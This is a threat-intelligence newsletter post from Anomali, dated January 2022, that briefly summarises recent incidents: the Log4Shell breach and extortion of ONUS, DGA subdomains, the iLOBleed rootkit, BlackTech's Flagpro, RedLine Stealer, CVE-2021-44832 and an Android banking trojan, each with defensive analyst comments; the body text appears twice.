Blog

Anomali Cyber Watch: $5 Million Breach Extortion, APTs Using DGA Subdomains, Cyberespionage Group Incorporates A New Tool, and More

Anomali Threat Research
January 5, 2022
Table of contents
<p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: <b>APT, Cyberespionage, Data breach, DGA, Infostealer, Phishing, Rootkit,</b> and <b>Vulnerabilities</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.</p> <p><img src="https://cdn.filestackcontent.com/t0XX64DmTCWUfWzSBaUa"/><br/> <em>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</em></p> <h2>Trending Cyber News and Threat Intelligence</h2> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/fintech-firm-hit-by-log4j-hack-refuses-to-pay-5-million-ransom/" target="_blank">Fintech Firm Hit by Log4j Hack Refuses to Pay $5 Million Ransom</a></h3> <p>(published: December 29, 2021)</p> <p>The Vietnamese crypto trading, ONUS, was breached by unknown threat actor(s) by exploiting the Log4Shell (CVE-2021-44228) vulnerability between December 11 and 13. The exploited target was an AWS server running Cyclos, which is a point-of-sale software provider, and the server was only intended for sandbox purposes. Actors were then able to steal information via the misconfigured AWS S3 buckets containing information on approximately two million customers. Threat actors then attempted to extort five million dollars (USD).<br/> <b>Analyst Comment:</b> Although Cyclos issued a warning to patch on December 13, the threat actors had already gained illicit access. Even though Log4Shell provided initial access to the compromised server, it was the misconfigured buckets the actors took advantage of to steal data.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947244" target="_blank">[MITRE ATT&amp;CK] Exploitation for Client Execution - T1203</a><br/> <b>Tags:</b> ONUS, Log4Shell, CVE-2021-44228,</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/" target="_blank">Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends</a></h3> <p>(published: December 29, 2021)</p> <p>Palo Alto Networks Unit42 researchers have published a report based on their tracking of strategically-aged malicious domains (registered but not used until a specific time) and their domain generation algorithm (DGA) created subdomains. Researchers found two Pegasus spyware command and control domains that were registered in 2019 and were not active until July 2021. A phishing campaign using DGA subdomains that were similar to those used during the SolarWinds supply chain attack was also identified.<br/> <b>Analyst Comment:</b> Monitor your networks for abnormal DNS requests, and have bandwidth limitations in place, if possible, to prevent numerous connections to DGA domains. Knowing which DGAs are most active in the wild will allow you to build a proactive defense by detecting any DGA that is in use. Anomali can detect DGA algorithms used by malware to assist in defending against these types of threats.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/3905073" target="_blank">[MITRE ATT&amp;CK] Dynamic Resolution - T1568</a> | <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/3905071" target="_blank">[MITRE ATT&amp;CK] Application Layer Protocol - T1071</a><br/> <b>Tags:</b> DGA , Pegasus, Phishing</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/" target="_blank">Implant.ARM.iLOBleed.a</a></h3> <p>(published: December 28, 2021)</p> <p>Amnpardaz researchers discovered a new rootkit that has been targeting Hewlett-Packard Enterprise’s Integrated Lights-Out (iLO) server management technology since 2020. The rootkit, dubbed iLOBleed, is the first-reported iLO malware. iLOBLeed has access to nearly everything by controlling iLO modules if it infects HP servers including firmware, hardware, and operating system. iLOBleed can manipulate firmware upgrade settings to keep them vulnerable and display fake update progress.<br/> <b>Analyst Comment:</b> iLOBleed has the potential for a lot of different malicious actions on HP servers because iLO is always active, however, no infection method was given by researchers. Network segmentation is important to prevent easy lateral movement, and ensure policies are in place to monitor firmware versions to your company’s needs.<br/> <b>Tags:</b> Malware, Rootkit, iLOBleed</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech" target="_blank">Flagpro: The New Malware Used by BlackTech</a></h3> <p>(published: December 28, 2021)</p> <p>The China-based, cyberespionage group BlackTech (Circuit Panda, Palmerworm, TEMP.Overboard, WaterBear) has been observed actively targeting English-speaking countries, Japan, and Taiwan, according to NTT Security researchers. BlackTech was observed using a new malware, dubbed Flagpro, that was distributed through spearphishing emails and delivered via a password-protected .zip or .rar file. The tailored email contains the password for the archive, inside which is a .xlsm file containing a malicious macro. If enabled, the macro will drop an executable in the startup directory named, dwm.exe in some cases, which is a version one or two of the Flagpro malware. Flagpro is capable of communicating to a command and control server using HTTP to receive commands and download additional payloads.<br/> <b>Analyst Comment:</b> BlackTech is a sophisticated group that, like other advanced groups, actively use spearphishing emails as an initial infection vector. Emails requesting that an attachment be opened, particularly those that are password protected, should be viewed with extreme caution. Employ information sharing policies in your company to limit the need or reliance of sharing documents through email attachments in favor of product management tools to store and share data.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947259" target="_blank">[MITRE ATT&amp;CK] Data Encoding - T1132</a> | <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/3904544" target="_blank">[MITRE ATT&amp;CK] Lateral Tool Transfer - T1570</a> | <a href="https://ui.threatstream.com/ttp/3905768" target="_blank">[MITRE ATT&amp;CK] Boot or Logon Autostart Execution - T1547</a><br/> <b>Tags:</b> BlackTech, Cyberespionage, Flagpro</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/" target="_blank">RedLine malware shows why passwords shouldn't be saved in browsers</a></h3> <p>(published: December 28, 2021)</p> <p>An unauthorized corporate VPN login revealed a Redline Stealer infection that stole credentials saved in web browsers, according to AhnLab ASEC researchers. Redline is a well known information-stealing malware capable of collecting numerous kinds of sensitive and system information. In this instance, the employee saved corporate credentials into a Chromium-based web browser (Chrome, Edge, Opera, Whale) that were then stolen by Redline Stealer.<br/> <b>Analyst Comment:</b> Avoid saving passwords in web browsers, Chrome attempts to save by default, because many malware families can steal information from web browsers. Instead, use a password manager such as Bitwarden, LastPass, or 1Password, among others.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/3905036" target="_blank">[MITRE ATT&amp;CK] Credentials from Password Stores - T1555</a><br/> <b>Tags:</b> RedLine Stealer, Password theft, Web browsers</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/" target="_blank">CVE-2021-44832 – Apache Log4j 2.17.0 Arbitrary Code Execution Via JDBAppender DataSource Element</a></h3> <p>(published: December 28, 2021)</p> <p>Another vulnerability, registered as CVE-2021-44832, affecting the popular Java logging package, Log4j has been identified by Checkmarx researchers. A threat actor must first have access and permissions to modify Log4j configuration files to exploit the vulnerability. By creating a malicious configuration file utilizing JDBC Appender, which is used for sending logs to a database, an actor can insert a DataSource referencing a JNDI URI to redirect to a remote location to execute what is located there.<br/> <b>Analyst Comment:</b> Apache’s Log4j security advisory, located here, offers the following mitigations: Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later). In prior releases confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java. Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability. Also note that Apache Log4j is the only Logging Services subproject affected by this vulnerability. Other projects like Log4net and Log4cxx are not impacted by this.<br/> <b>Tags:</b> Log4j, Vulnerability, CVE-2021-44832</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://thehackernews.com/2021/12/new-android-malware-targeting-brazils_27.html" target="_blank">New Android Malware Targeting Brazil’s Itaú Unibanco Bank Customers</a></h3> <p>(published: December 27, 2021)</p> <p>Cyble researchers further analyzed a malware sample shared by MalwareHunterTeam on Twitter, during which they found that it was a fake app impersonating the Brazilian financial services company, Itaú Unibanco. The unknown threat actor(s) behind this app created a fake Google Play Store page to host an app called, _lTAU_SINC/sincronizador. If downloaded, the malware inside the app attempts to make fraudulent financial transactions on authentic Itaú Unibanco apps.<br/> <b>Analyst Comment:</b> It is important to only use the Google Play Store to obtain your software (for Android users) and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be deployed on devices, particularly those that could contain sensitive information. Furthermore, always ensure that you are downloading the correct application by visiting the official provider’s website.<br/> <b>Tags:</b> Fake app, Android, Malware, Itaú Unibanco</p> </div>
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.

January 5, 2022
-
Anomali Threat Research
,

Anomali Cyber Watch: $5 Million Breach Extortion, APTs Using DGA Subdomains, Cyberespionage Group Incorporates A New Tool, and More

<p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: <b>APT, Cyberespionage, Data breach, DGA, Infostealer, Phishing, Rootkit,</b> and <b>Vulnerabilities</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.</p> <p><img src="https://cdn.filestackcontent.com/t0XX64DmTCWUfWzSBaUa"/><br/> <em>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</em></p> <h2>Trending Cyber News and Threat Intelligence</h2> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/fintech-firm-hit-by-log4j-hack-refuses-to-pay-5-million-ransom/" target="_blank">Fintech Firm Hit by Log4j Hack Refuses to Pay $5 Million Ransom</a></h3> <p>(published: December 29, 2021)</p> <p>The Vietnamese crypto trading, ONUS, was breached by unknown threat actor(s) by exploiting the Log4Shell (CVE-2021-44228) vulnerability between December 11 and 13. The exploited target was an AWS server running Cyclos, which is a point-of-sale software provider, and the server was only intended for sandbox purposes. Actors were then able to steal information via the misconfigured AWS S3 buckets containing information on approximately two million customers. Threat actors then attempted to extort five million dollars (USD).<br/> <b>Analyst Comment:</b> Although Cyclos issued a warning to patch on December 13, the threat actors had already gained illicit access. Even though Log4Shell provided initial access to the compromised server, it was the misconfigured buckets the actors took advantage of to steal data.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947244" target="_blank">[MITRE ATT&amp;CK] Exploitation for Client Execution - T1203</a><br/> <b>Tags:</b> ONUS, Log4Shell, CVE-2021-44228,</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/" target="_blank">Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends</a></h3> <p>(published: December 29, 2021)</p> <p>Palo Alto Networks Unit42 researchers have published a report based on their tracking of strategically-aged malicious domains (registered but not used until a specific time) and their domain generation algorithm (DGA) created subdomains. Researchers found two Pegasus spyware command and control domains that were registered in 2019 and were not active until July 2021. A phishing campaign using DGA subdomains that were similar to those used during the SolarWinds supply chain attack was also identified.<br/> <b>Analyst Comment:</b> Monitor your networks for abnormal DNS requests, and have bandwidth limitations in place, if possible, to prevent numerous connections to DGA domains. Knowing which DGAs are most active in the wild will allow you to build a proactive defense by detecting any DGA that is in use. Anomali can detect DGA algorithms used by malware to assist in defending against these types of threats.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/3905073" target="_blank">[MITRE ATT&amp;CK] Dynamic Resolution - T1568</a> | <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/3905071" target="_blank">[MITRE ATT&amp;CK] Application Layer Protocol - T1071</a><br/> <b>Tags:</b> DGA , Pegasus, Phishing</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/" target="_blank">Implant.ARM.iLOBleed.a</a></h3> <p>(published: December 28, 2021)</p> <p>Amnpardaz researchers discovered a new rootkit that has been targeting Hewlett-Packard Enterprise’s Integrated Lights-Out (iLO) server management technology since 2020. The rootkit, dubbed iLOBleed, is the first-reported iLO malware. iLOBLeed has access to nearly everything by controlling iLO modules if it infects HP servers including firmware, hardware, and operating system. iLOBleed can manipulate firmware upgrade settings to keep them vulnerable and display fake update progress.<br/> <b>Analyst Comment:</b> iLOBleed has the potential for a lot of different malicious actions on HP servers because iLO is always active, however, no infection method was given by researchers. Network segmentation is important to prevent easy lateral movement, and ensure policies are in place to monitor firmware versions to your company’s needs.<br/> <b>Tags:</b> Malware, Rootkit, iLOBleed</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech" target="_blank">Flagpro: The New Malware Used by BlackTech</a></h3> <p>(published: December 28, 2021)</p> <p>The China-based, cyberespionage group BlackTech (Circuit Panda, Palmerworm, TEMP.Overboard, WaterBear) has been observed actively targeting English-speaking countries, Japan, and Taiwan, according to NTT Security researchers. BlackTech was observed using a new malware, dubbed Flagpro, that was distributed through spearphishing emails and delivered via a password-protected .zip or .rar file. The tailored email contains the password for the archive, inside which is a .xlsm file containing a malicious macro. If enabled, the macro will drop an executable in the startup directory named, dwm.exe in some cases, which is a version one or two of the Flagpro malware. Flagpro is capable of communicating to a command and control server using HTTP to receive commands and download additional payloads.<br/> <b>Analyst Comment:</b> BlackTech is a sophisticated group that, like other advanced groups, actively use spearphishing emails as an initial infection vector. Emails requesting that an attachment be opened, particularly those that are password protected, should be viewed with extreme caution. Employ information sharing policies in your company to limit the need or reliance of sharing documents through email attachments in favor of product management tools to store and share data.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947259" target="_blank">[MITRE ATT&amp;CK] Data Encoding - T1132</a> | <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/3904544" target="_blank">[MITRE ATT&amp;CK] Lateral Tool Transfer - T1570</a> | <a href="https://ui.threatstream.com/ttp/3905768" target="_blank">[MITRE ATT&amp;CK] Boot or Logon Autostart Execution - T1547</a><br/> <b>Tags:</b> BlackTech, Cyberespionage, Flagpro</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/" target="_blank">RedLine malware shows why passwords shouldn't be saved in browsers</a></h3> <p>(published: December 28, 2021)</p> <p>An unauthorized corporate VPN login revealed a Redline Stealer infection that stole credentials saved in web browsers, according to AhnLab ASEC researchers. Redline is a well known information-stealing malware capable of collecting numerous kinds of sensitive and system information. In this instance, the employee saved corporate credentials into a Chromium-based web browser (Chrome, Edge, Opera, Whale) that were then stolen by Redline Stealer.<br/> <b>Analyst Comment:</b> Avoid saving passwords in web browsers, Chrome attempts to save by default, because many malware families can steal information from web browsers. Instead, use a password manager such as Bitwarden, LastPass, or 1Password, among others.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/3905036" target="_blank">[MITRE ATT&amp;CK] Credentials from Password Stores - T1555</a><br/> <b>Tags:</b> RedLine Stealer, Password theft, Web browsers</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/" target="_blank">CVE-2021-44832 – Apache Log4j 2.17.0 Arbitrary Code Execution Via JDBAppender DataSource Element</a></h3> <p>(published: December 28, 2021)</p> <p>Another vulnerability, registered as CVE-2021-44832, affecting the popular Java logging package, Log4j has been identified by Checkmarx researchers. A threat actor must first have access and permissions to modify Log4j configuration files to exploit the vulnerability. By creating a malicious configuration file utilizing JDBC Appender, which is used for sending logs to a database, an actor can insert a DataSource referencing a JNDI URI to redirect to a remote location to execute what is located there.<br/> <b>Analyst Comment:</b> Apache’s Log4j security advisory, located here, offers the following mitigations: Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later). In prior releases confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java. Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability. Also note that Apache Log4j is the only Logging Services subproject affected by this vulnerability. Other projects like Log4net and Log4cxx are not impacted by this.<br/> <b>Tags:</b> Log4j, Vulnerability, CVE-2021-44832</p> </div> <div class="trending-threat-article" id="trending-threats"> <h3 id="article-1"><a href="https://thehackernews.com/2021/12/new-android-malware-targeting-brazils_27.html" target="_blank">New Android Malware Targeting Brazil’s Itaú Unibanco Bank Customers</a></h3> <p>(published: December 27, 2021)</p> <p>Cyble researchers further analyzed a malware sample shared by MalwareHunterTeam on Twitter, during which they found that it was a fake app impersonating the Brazilian financial services company, Itaú Unibanco. The unknown threat actor(s) behind this app created a fake Google Play Store page to host an app called, _lTAU_SINC/sincronizador. If downloaded, the malware inside the app attempts to make fraudulent financial transactions on authentic Itaú Unibanco apps.<br/> <b>Analyst Comment:</b> It is important to only use the Google Play Store to obtain your software (for Android users) and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be deployed on devices, particularly those that could contain sensitive information. Furthermore, always ensure that you are downloading the correct application by visiting the official provider’s website.<br/> <b>Tags:</b> Fake app, Android, Malware, Itaú Unibanco</p> </div>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.